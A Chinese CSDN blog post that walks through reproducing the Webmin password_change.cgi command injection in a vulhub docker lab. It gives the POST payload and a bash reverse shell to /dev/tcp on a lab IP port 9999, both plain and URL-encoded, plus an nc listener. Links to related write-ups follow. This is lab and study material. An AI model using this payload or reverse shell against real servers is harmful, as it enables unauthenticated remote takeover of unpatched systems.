vulhub之Webmin篇

咩了个咩咩

于 2024-04-10 10:09:17 发布

阅读量255

点赞数 7

文章标签：安全经验分享笔记测试工具网络安全

本文链接：https://blog.csdn.net/weixin_56306210/article/details/137585696

版权

Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。Webmin支持绝大多数的Unix系统，这些系统除了各种版本的linux以外还包括：AIX、HPUX、Solaris、Unixware、Irix和FreeBSD等。

影响版本：

webmin<=1.920

一、环境准备

利用dokcer启动靶场环境

二、漏洞复现

浏览器访问地址：192.168.125.130:10000

使用https://协议访问

开启抓包

这里是post方式传输，将接口换成：/password_change.cgi

使用下面的poc:

user=roottext1&old=ls&new1=test2&new2=test2，点击send

漏洞复现完成

三、getshell

反弹shell

使用URL编码将下面命令进行编码：

bash -c "bash -i >& /dev/tcp/192.168.125.130/9999 0>&1"

URL编码后:

%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%32%35%2e%31%33%30%2f%39%39%39%39%20%30%3e%26%31%22

在kali虚拟机使用命令：nc -lvp 9999开启监听，同时将上面的编码值替换之前old参数处的数值：

反弹shell成功

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

咩了个咩咩

关注关注

7
点赞
踩
2

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

CVE-2019-15107 复现（Webmin）

痴人说梦梦中人

11-13

888

一、漏洞描述 Webmin的是一个用于管理类Unix的系统的管理配置工具，具有网络页面。在其找回密码页面中，存在一处无需权限的命令注入漏洞，通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。在重置密码功能中发现了一个错误，该错误允许恶意第三方由于缺少输入验证而执行恶意代码。影响版本为Webmin<=1.920。二、环境搭建下载vulhub、编译运行 # Download project wget https://github.com/vulhub/vulhub/archive

vulhub漏洞复现73_Webmin

weixin_44193247的博客

02-13

403

vulhub漏洞复现练习篇

参与评论您还未登录，请先登录后发表或查看评论

记录一次pWnOS1.0打靶（vulnhub） webmin漏洞利用

chencyyan的博客

01-14

1166

萌新第一次写blog，各位大佬别喷。有错误和补充的地方希望各位大佬各位师傅指出本博客内容借鉴Bossfrank和红队笔记大佬「红队笔记」靶机精讲：pWnOS1.0 - 在Perl CGI架构下构造反弹shell，你可以吗？红队打靶：pWnOS1.0打靶思路详解之webmin漏洞利用[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传](https://img-home.csdnimg.cn/images/20230724024159.png?

vulhub学习文档-Webmin远程命令执行漏洞复现

ploto_cs的博客

09-09

1021

Webmin远程命令执行漏洞复现一．漏洞介绍（一）编号 CVE-2019-15107 （二）概述 Webmin的是一个用于管理类Unix的系统的管理配置工具，具有网络页面。在其找回密码页面中，存在一处无需权限的命令注入漏洞，通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。在重置密码功能中发现了一个错误，该错误允许恶意第三方由于缺少输入验证而执行恶意代码。（三）影响版本 Webmin <= 1.920 （四）适用条件版本满足要求，且服务器的配置文件允许修改密码时，在不知

Webmin 远程命令执行漏洞（CVE-2019-15107）复现，python编写POC和EXP

wangqiao258的博客

10-03

497

环境搭建：使用vulhub，进入对应文件夹启动环境： [root@localhost CVE-2019-15107]# cd /home/vulhub/webmin/CVE-2019-15107/ [root@localhost CVE-2019-15107]# docker-compose up -d 查看端口： [root@localhost CVE-2019-15107]# docker ps CONTAINER ID IMAGE COMMAND

CVE-2019-15642:Webmin远程执行代码（已认证）

03-10

cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -d root@9460493fa985:/# passwd root Webmin>用户名= root，密码= root :high_voltage: root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master ...

CentOS服务器下安装Webmin管理系统的步骤

09-15

Webmin是一款功能强大的基于Web的Unix/Linux系统管理工具，它为管理员提供了图形化的界面，使得在远程管理Linux服务器时无需依赖SSH和输入命令行。Webmin的界面直观易用，对于那些不熟悉命令行或者希望有类似Windows...

Webmin是目前功能最强大的基于Web的Unix系统管理工具最新版下载 webmin-1.981.tar.gz

09-09

Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。目前Webmin支持绝大多数的Unix系统，这些系统除了各种版本的linux以为还包括：AIX、HPUX、...

webmin-1.670下载

07-31

用于linux服务器配置

红队笔记11：pWnOS1.0打靶流程之webmin漏洞超级利用（vulnhub）

最新发布

qq_63442530的博客

04-02

1254

Webmin是一个基于Web的Linux/Unix系统管理软件。简单地说，就是你可以打开一个浏览器，然后输入Webmin的管理地址，在打开的页面中就可以管理你的Linux/Unix系统了,Webmin 是由一个简单的 Web 服务器和一些 CGI 程序组成的系统， Web 服务器和所有 CGI 程序都是使用Perl 5，并且不使用非标准的 Perl 模块。这也算是一个CMS，既然是CMS就有可能会存在历史漏洞。

Webmin 远程命令执行漏洞（CVE-2019-15107）漏洞复现

s1056481432的博客

08-19

1168

漏洞介绍 Webmin是一个用于管理类Unix系统的管理配置工具，具有Web页面。在其找回密码页面中，存在一处无需权限的命令注入漏洞，通过这个漏洞攻击者即可以执行任意系统命令。漏洞环境在vulhub执行如下命令，启动webmin 1.910： docker-compose up -d 执行完成后，访问https://your-ip:10000，忽略证书后即可看到webmin的登录页面。漏洞复现参考链接中的数据包是不对的，经过阅读代码可知，只有在发送的user参数的值不是已知Linux用户的情况

漏洞复现——Webmin 远程命令执行（CVE-2019-15107）

lay77的博客

10-12

251

Webmin是一款基于Web的远程管理工具，该工具存在一个远程命令执行漏洞（CVE-2019-15107）。攻击者可以通过特制的请求，未经身份验证的情况下执行任意命令，并可能导致服务器被完全控制。禁用或限制Webmin的远程访问，仅允许访问来自受信任的IP地址。尽快更新Webmin版本至1.930或更高版本，以修复该漏洞。配置Web服务器强制使用HTTPS加密连接，并使用安全证书。使用防火墙规则，限制对Webmin的访问仅来自内部网络。Webmin版本：1.920及之前的版本。此漏洞报告无附带文件。

Webmin远程命令执行漏洞复现

yuan_boss的博客

10-12

625

详细的来说，该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码，该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞，该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。payload中的IP改为目标网站的IP，注意user=rootxx这部分，如果写的是user=root，肯定不能成功注入，必须是目标网站的服务器中不存在的用户，否则就会命令执行失败。在其找回密码页面中，存在一处无需权限的命令注入漏洞，通过这个漏洞攻击者即可以执行任意系统命令。

CVE-2019-15107 Webmin远程命令执行漏洞复现（文末EXP）

Vitaminapple的博客

06-03

1168

CVE-2019-15107 Webmin远程命令执行漏洞复现 1 环境搭建 1.1 Vulhub靶机搭建 1.1.1 环境安装（1）安装docker $ curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun （2）安装Docker-Compose $ pip install docker-compose #如果没有pip需要先安装 $ yum -y install epel-release $ yum -y inst

Webmin 远程代码执行Getshell漏洞复现编号：CVE-2022-0824

08-31

2097

Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。webmin1.990之前版本存在权限提升漏洞，该漏洞源于错误的程序对高级本地过程调用。攻击者可以利用该漏洞能够修改操作系统文件系统并以运行应用程序权限执行操作系统命令。......

vulhub靶场Webmin(CVE-2019-15107)漏洞复现

weixin_45095113的博客

12-12

832

Webmin(CVE-2019-15107)漏洞复现

Webmin 远程命令执行漏洞

jammny

01-16

1518

前言： Webmin是一个用于管理类Unix系统的管理配置工具，具有Web页面。在其找回密码页面中，存在一处无需权限的命令注入漏洞，通过这个漏洞攻击者即可以执行任意系统命令。影响版本： Webmin <= 1.920 漏洞代码： def peer "#{ss1 ? 'https:// : ' http://' }#{rhost}:#{rport}" end # Targe...

vulhub环境搭建+靶场使用

jammny

01-12

9074

前言： Vulhub是一个基于docker和docker-compose的漏洞环境集合，进入对应目录并执行一条语句即可启动一个全新的漏洞环境，让漏洞复现变得更加简单，让安全研究者更加专注于漏洞原理本身。一、安装docker 安装docker：参考博主的博客：https://blog.csdn.net/qq_41832837/article/details/103948314 ...

Webmin未经身份验证的远程代码执行

weixin_43828818的博客

05-04

416

[墨者学院]——Webmin未经身份验证的远程代码执行做题前看看大佬写的漏洞原理：[https://blog.csdn.net/qq_43380549/article/details/100011292] 漏洞描述：Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计，互联网上大约有13w台机器使用Webm...

Webmin配置Linux服务器教程

"这篇文档是关于如何利用Webmin工具来设置Linux服务器的实践教程，适合Linux初学者。作者在实习期间通过同事指导，详细记录了配置Linux服务器的过程，包括Webmin的安装、登录以及Webmin中对用户、Apache服务器和FTP...